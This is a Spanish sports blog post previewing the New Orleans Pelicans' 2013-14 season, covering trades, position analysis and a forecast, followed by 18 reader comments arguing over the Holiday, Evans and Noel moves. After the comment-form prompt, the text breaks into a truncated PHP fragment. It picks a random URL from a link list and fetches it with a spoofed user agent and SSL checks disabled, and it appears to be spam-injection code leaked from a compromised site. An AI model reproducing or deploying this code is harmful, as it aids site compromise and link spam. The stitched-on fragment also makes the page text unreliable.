New Orleans Pelicans: Nombre nuevo, ¿vida nueva?

14 de October de 2013 por TheDeerHunter

Adiós a la marca heredada de Charlotte. El equipo adopta el símbolo del estado de Lousiana, el precioso pelícano pardo occidental con el que seguro se deben de sentir más identificados que con una avispa que no les trajo demasiada suerte y sí algún trágico recuerdo. La joven franquicia comienza este nuevo capítulo con una consolidada estabilidad institucional que les permite mirar al futuro con optimismo. En pleno proceso de construcción el equipo comienza a tomar  forma interesante. Con los ambiciosos movimientos efectuados durante la offseason se pretende acelerar todo. En poco tiempo deberíamos empezar a observar y a exigirles resultados pero aún no ha llegado ese momento.

Ha sido un verano movido. Deberíamos centrarnos en los potentes traspasos en los que se han visto involucrados los Pelicans, pero todo quedó en un segundo plano tras el duro golpe que supuso la pérdida de Gia Allemand, pareja de Ryan Anderson. Nadie puede estimar cómo afectará tan trágico suceso. Sólo podemos desear que el talentoso jugador pueda encontrar algo de refugio en la cancha y que pueda superar una de las peores experiencias que podamos imaginar.

Lograron sorprendernos con el traspaso de Nerlens Noel, 6ª elección del draft, a cambio de Jrue Holiday. Con esta movimiento las horas en New Orleans estaban contadas para Greivis Vazquez. Tras la experiencia con Eric Gordon no estamos seguros si traspasarlo por Tyreke Evans era la decisión más inteligente. Son 26 millones de dólares invertidos en dos jugadores que no juegan temporadas completas. Por si fuera poco, Dell Demps nos terminaba de desconcertar largando a un Robin Lopez que había sorprendido gratamente el curso anterior. 

Entonces, ¿ha empeorado la plantilla? Habrá que verlo. Los movimientos son cuestionables pero la apuesta es valiente. Pecaron de falta de pegada y se ha traído un all-star y un ¿small-forward? versátil y con gran potencial. Quizá también crean que Monty Williams puede sacar tanto petróleo de Stiemsma como lo hizo de Lopez. Quizá vieron algo en Jeff Withey que el resto no vimos… Repasemos más detenidamente el equipo.

Jrue Holiday es uno de los nombres propios de la 2012/13. A priori uno de los mejores bases calidad-precio de toda la liga. Destaca su rango de tiro y su versatilidad como combo-guard. No sabemos si era prioritaria su adquisición tras el buen sabor de boca que dejó Vasquez pero bendito panorama el que se abre con la pareja que va a formar con Anthony Davis por muchos años. Su sustituto natural será Brian Roberts, otro base de perfil eléctrico y anotador. Es suficiente con dos hombres en esta posición, pues Evans también podrá asumir el papel de director cuando esté en cancha.

En la posición de escolta Eric Gordon es el teórico titular. En condiciones ideales tiene sangre de all-star. El problema es que lo ideal ni está ni se le espera en su caso. Se descuenta que se perderá partidos y quizá por ello también se ha optado por Tyreke Evans, que puede bailar por todas las posiciones del perímetro. Sería extraño que un par de “cojos” terminaran siendo el complemento perfecto entre ellos. En cualquier caso como tercera opción llama a la puerta el “hijito de Doc”, Austin Rivers. Un hombre con gran talento ofensivo que huele a que disfrutará de buenos minutos y mayor protagonismo este año. Además, Monty también cuenta con un especialista tirador como Anthony Morrow.

En principio se pretendía potenciar la posición de small-forward y se ha fichado a Tyreke Evans para ello. No es un tres puro y también se esperan problemas físicos, por lo que no será titular y se buscará una rotación conservadora a su medida. Le vino bien su desplazamiento a la ala y la disminución de sus galones en Sacramento y esa es la idea en su actual destino. Al-Farouq Aminu abrirá de inicio. Un defensor de élite radicalmente distinto a Tyreke. Dos interesantes opciones tácticas para Monty Williams. Mucho nos tememos que Darius Miller volverá a chupar banco de lo lindo este año también.

En la posición de cuatro la gran esperanza de la franquicia, Anthony Davis. Extrañamente dejó un ligero poso de decepción en su excelente temporada rookie pero nadie puede negar que es ya mismo uno de los mejores interiores de la liga. Si hablamos de buenas combinaciones, la que forma con Ryan Anderson es extraordinaria. Nada de incompatibilidad entre ellos. Físico y talento cogidos de la mano.

Pero no todo es maravilloso en Nueva Orleans. La posición de center la ocupará previsiblemente Greg Stiemsma. No tenemos quejas del jugador pero no da el perfil de titular indiscutible. Jason Smith, siendo 4 natural, sólo jugará de pívot. Tenemos muchas dudas de que la adquisición del rookie Jeff Withey cambie nuestra impresión de que es la posición peor cubierta del equipo.

Así, como decimos, va a ser interesante la temporada en New Orleans. Hay expectación, de eso no hay duda. Acertando o no en los movimientos creemos que la base para crecer se ha logrado y que el equipo lo va a notar.  Van a dar guerra. No les da para pelear playoffs en un infierno de conferencia pero pone los cimientos para empezar a pensar de forma realista en ellos a partir del próximo curso.

Quinteto inicial: Jrue Holiday, Eric Gordon, Al-Farouq Aminu, Anthony Davis, Greg Stiemsma.
6º hombre: Tyreke Evans

Altas: Tyreke Evans (SAC), Jrue Holiday (PHI), Anthony Morrow (DAL), Greg Stiemsma (MIN), Jeff Withey (N).
Bajas: Louis Amundson, Terrel Harris, Xavier Henry (LAL), Robin Lopez (POR), Roger Mason Jr., Greivis Vásquez (SAC).

Pronóstico: Alrededor de 35 victorias. Últimos de la Southwest.

Comenta

18 comentarios a esta entrada

  1. rumbero dice:
    #1

    Ayer enganché un trozo del Hawks-NOLA y ojito con Davis. Es cierto que su primera temporada nos dejó algo frios, con mucha lesión de por medio también es verdad, pero a ver en esta. De momento en esta preseason se está paseando de lo lindo. Se le ve más fuerte pero igual de rápido, y metiéndolas de todos los colores. Y a ver también como es el segundo año de Rivers, que este si que decepcionó de verdad. No deberían faltarle minutos para ir encauzando ese talento para el bien del equipo. De momento no está disgustando.

    Importante como lo hagan estos dos, porque este equipo con Gordon y Evans jugando más de 70 partidos yo creo que darían mucha guerra, pero como se dice en el análisi parece algo altamente improbable.

      Citar

  2. Vader dice:
    #2

    Creo que se tendrian que haber quedado con Noel y Vazquez y buscar un buen alero titular. Noel y Davis pidrian haber sido un juego interior de lujo y mucho futuro. Quizas dentro de 5 años los dos serán estrellas de la liga y nos acordemos de la oportunidad que dejaron escapar los Pelicans.

    Saludos

      Citar

  3. Denise dice:
    #3

    Yo no los veo ultimos de su división. Para mi Dallas es muy inferior a ellos si no hay lesiones. Los veo peleando por las ultimas plazas de PO con Wolves y con Portland, pero tengo buenas sensaciones con las avispas y me la jugaré en la porra metiendolos en playoffs.
    Creo que Anderson será el 4 titular y Davis el 5, y en caso de no serlo, veo complicado poner a Stiemisma de center titular en este equipo. Confiaría mas en Jason Smith,

      Citar

  4. Sancho88 dice:
    #4

    Vader:
    Creo que se tendrian que haber quedado con Noel y Vazquez y buscar un buen alero titular. Noel y Davis pidrian haber sido un juego interior de lujo y mucho futuro. Quizas dentro de 5 años los dos serán estrellas de la liga y nos acordemos de la oportunidad que dejaron escapar los Pelicans.

    Saludos

    Totalmente de acuerdo contigo Vader. Han sobrepagado a un cojo desmotivado de la vida como Tyreke cuando deberían haber seguido confiando en Vásquez-Davis-Anderson y haberse quedado con una joya de futuro como Noel. Con un poco más de lo que han pagado por Evans podrían haber ido a por Iguodala, o haberse esperado a Deng o alguien así. Pero ahora da la sensación de que jugadores buenos como Roberts o Rivers que van a progresar muchísimo este año no pueden jugar porque hay otros que les quitan el sitio. Molaba mucho el equipo que tenían el año pasado y tan solo les faltaba esperar el salto cualitativo de Davis y Rivers, y haber esperado este año a Noel, pick 6 tirado a la basura. Sinceramente, un Vásquez-Gordon-Aminu-Davis-Noel con Anderson de 6º hombre, Roberts y Rivers teniendo su sitio claramente y no teniendo por delante a un caradura como Tyreke, y Robin López y Jason Smith completando una pintura de 5 hombres de lujo habría sido una mucho mejor solución. Igual este año era de transición, pero habrían estado otro año más en lotería para escoger un alero top, y ya sí el año que viene tendrían equipo de playoffs.

    No sé, han apostado por meter pasta al backourt cuando tenían que haber confiado en su lotería y en los hombres pequeños que debían crecer esta temporada. Seguro que Monty Williams sabe domar este equipo, pero las lesiones de Gordon y Evans son de dos caraduras miembros supremos del cazo mix. Cagada los Pelicans

      Citar

  5. Jose Luis dice:
    #5

    Traer a Iguodala o Deng Sancho? Esos son jugadores de contender…

    El cambio es Noel y Vasquez por Holiday y Evans, así grosso modo. No sé. En los kings no se sabe ni si Vasquez va a ser titular… Holiday seguro que es titular y no me extrañaría verle en algún all-star, cosa que Vasquez ni se le espera.

    Evans por Noel, bueno… es cierto que pagas más por Evans. Pero Gordon es mister lesiones, Evans si se motiva, quien sabe. Noel también les dejaba muchas dudas por las lesiones, y además parece bastante negado en ataque, aunque parece que la dupla Davis-Noel hubiera sido un muro infranqueable.

    Yo creo que quedarse como estaban era peor. Evans es un jugador fácilmente traspasable si quieren y, sorpresa, ahora pueden traspasar a Gordon por un alero de más clase. Un Rudy Gay, con la de fallas que le veo, por ejemplo. O Jeff Green, Gallinari, Batum, todo eso son escenarios de traspaso para ellos si lo requieren, teniendo dos escoltas que cobran 8 y 12 millones, tienen muchas opciones de cuadrar traspasos. Yo no lo veo mal.

    Además, ellos quería estrenar el nombre de Pelicans a lo grande.

      Citar

  6. portu dice:
    #6

    Tb me gustaba más la opción original, no olvidemos q por Holiday tb entregaron la 1era ronda 2014 si no recuerdo mal… Mucha tela, y no es q Holiday no lo valga, pero es q tampoco es muchísimo mejor q Vasquez… El equipete de aquí a 2-3 años sería más q interesante: Vasquez/B. Roberts-Gordon/Rivers-Aminu-A. Davis/R. Anderson-Noel/Whittey más lo q pillaran en el draft 2014 y algún FA para cubrir esa posición de 3. Hablaba el otro día del gran potencial de los jóvenes de Utah y este equipo lo superaría por izda y por derecha.

      Citar

  7. Simon dice:
    #7

    Para mi la clave de aquel traspaso para considerarlo malo para New Orleans es precisamente lo que comenta Portu, es que no dan la ronda de 2013 si no que si las cosas no van bien este año también perderán la de 2014… por que es protegida top 5… y a no ser que la suerte les sonria en el sorteo su pick va a estar entre el 5 y el 10… Para mi, Holiday no vale perder dos top 10 seguidos, y menos en un draft como el que se viene encima… si el equipo no funciona por lo que sea, NOLA se va a encontrar con un equipo que no gana, sin margen salarial y sin elecciones altas de primeras.

      Citar

  8. txusma dice:
    #8

    Yo creo que Holiday es mucho mejor que Vasquez. Por potencial (Holiday es 3 años más joven) y en defensa sobretodo. En ataque son dos jugadores algo distintos pero entre pagarle 11 kilos a Holiday y 8-9 a Vasquez que es a lo q habría esperado de quedarse de titular en los Hornets y jugar muchos minutos yo lo hubiera tenido claro.

    Vamos a ver como están las rodillas de Nerlens Noel. Por el bien de la liga y el espectáculo esperemos que no sea del club cristal de bohemia.

      Citar

  9. rumbero dice:
    #9

    Sancho88: Molaba mucho el equipo que tenían el año pasado y tan solo les faltaba esperar el salto cualitativo de Davis y Rivers, y haber esperado este año a Noel, pick 6 tirado a la basura.

    No jodas, cambiar un pick 6 por un base de 23 años que ha sido All-Star a mi no me parece un mal negocio. Otra cosa es esa primera ronda del 2014 que comenta portu. Pero vaya, que ya estamos dando por seguro que Noel lo va a rebentar (y ojalá que sea así) pero es un melón que da miedo abrir, sino no hubiera caído hasta el 6. A mi la jugada me pareció buena en su momento por parte de Pelicans, no asumen riesgos y consiguen un base más joven que y posiblemente mejor que Vasquez para unas cuantas temporadas. Otra cosa es lo que luego sacaron por este, que Evans igual no mola tanto

      Citar

  10. Sancho88 dice:
    #10

    Efectivamente, por no abrir el melón serán un octavo de conferencia como mucho y a palmar en primera ronda, cuando podrían haber llegado mucho más lejos con el melón en el equipo. Tyreke ya vereis que borradas épicas se mete. No está mentalmente en los partidos

      Citar

  11. txusma dice:
    #11

    La propia definición de melón imposibilita que puedas decir “podrían haber llegado mucho más lejos con el melón”. Hasta que no lo has abierto no sabes si te ha salido un Anthony Davis o un Greg Oden. En cambio, Jrue Holiday es apuesta segura.
    Otra cosa es Tyreke Evans. Entre sus tobillos y su cabeza…

      Citar

  12. Blade Petrovic dice:
    #12

    Y por qué no un Holiday-Gordon-Evans-Anderson-Davis o poniendo a Aminu de titular y a Evans de sexto hombre?

      Citar

  13. portu dice:
    #13

    No se trata de q Noel sea una superestrella, es simplemente que si se recupera de su lesión, su estilo de juego le convierte en el complemento ideal de A. Davis. Serían 2 torres gemelas, de los más bestia q se podría ver en la NBA en cuanto a defensa… Muchos grandes equipos se forman en torno a jugadores interiores y NOP tenía una gran oportunidad. Todo ese plus es superior a lo q mejora Holiday respecto a Vasquez, sobretodo en una liga donde no es tan difícil acbar consiguiendo un buen base.

      Citar

  14. Esteban dice:
    #14

    tan bueno les parece noel?
    pick 6 en un draft de los mas flojos de los que se recuerdan

    a menos que cambie su fisico de forma radical no lo veo jugando en la nba, con esos brasitos no puede ni soñar en marcar a howard

      Citar

  15. Esteban dice:
    #15

    no se cuando se hizo el analisis, quiza todavia no habia arrancado la pretemporada, pero algo hay que decir de la pretemporada que se esta jugando davis, esta promediando mas de 20 puntos y 9 rebotes y 2 tapones

    de seguir a este ritmo, jugara en all star en el lugar de griffin SIN DUDAS

      Citar

  16. portu dice:
    #16

    Tú mismo te respondes en estos 2 comentarios seguidos, ¿has visto los bracitos de A. Davis? Físicamente me parecen jugadores similares. Es pronto para saber si se va a recuperar por completo, así q mucho menos me atrevería a decir q va a ser muy bueno, pero por potencial creo q sobrepasa a varios de los q le precedieron en el draft.

      Citar

  17. Esteban dice:
    #17

    portu:
    Tú mismo te respondes en estos 2 comentarios seguidos, ¿has visto los bracitos de A. Davis? Físicamente me parecen jugadores similares. Es pronto para saber si se va a recuperar por completo, así q mucho menos me atrevería a decir q va a ser muy bueno, pero por potencial creo q sobrepasa a varios de los q le precedieron en el draft.

    diciento, noel no solo tiene brazos flacos, no tiene espalda tampoco
    davis en cambio, tenia los brazos flacos pero una espalda enorme, en cuanto sumo musculo paso a ser un jugador con un fisico increible
    yo no veo a noel engordando brazos, quedarian feamente desproporcionados con su espalda
    y vamos que tampoco es tan alto…

    no se, como mucho noel sera un buen centro titular, estilo okafor quiza, pero no mas que eso

      Citar

  18. Luis H. dice:
    #18

    Quizá no habéis visto jugar mucho a Jeff Withey, pero es un gran fichaje de los Pelicans. Perfil físico muy parecido a Noel, muy bueno defensivamente -especialmente en el tapón- y con potencial de crecimiento. Creo que acabará siendo titular a poco que espabile, Jason Smith y Stiemsma son más relleno que otra cosa en condiciones normales. Aminu no es mal jugador para ser 3 titular y hay que ver si Monty Williams consigue motivar a Evans para que sea 6º hombre. Interesantes de ver

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>